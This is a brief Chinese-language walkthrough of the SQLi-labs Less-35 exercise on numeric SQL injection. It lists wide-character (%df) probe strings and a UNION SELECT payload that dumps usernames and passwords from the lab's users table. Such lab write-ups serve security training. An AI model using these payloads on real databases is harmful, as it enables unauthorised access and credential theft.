Sqli labs less 35

本less的考点是数值型注入

1.常规方法测试，提示无报错但1被转义

 

 

 2.同上利用宽字符进行注释测试%df

?id=1%df'--+
?id=1%df')--+
?id=1%df'))--+
?id=1%df"--+
?id=1%df")--+
?id=1%df"))--+

 

3.直接用 ORDER BY 排序，网页回显正常数据，确定是数值型注入。由于数值型注入不涉及任何编码问题，因此转义操作都没作用。

 

 4.爆出用户名密码：?id=-1 UNION SELECT 1,group_concat(concat_ws(0x3a,username,password)),3 FROM security.users--+

.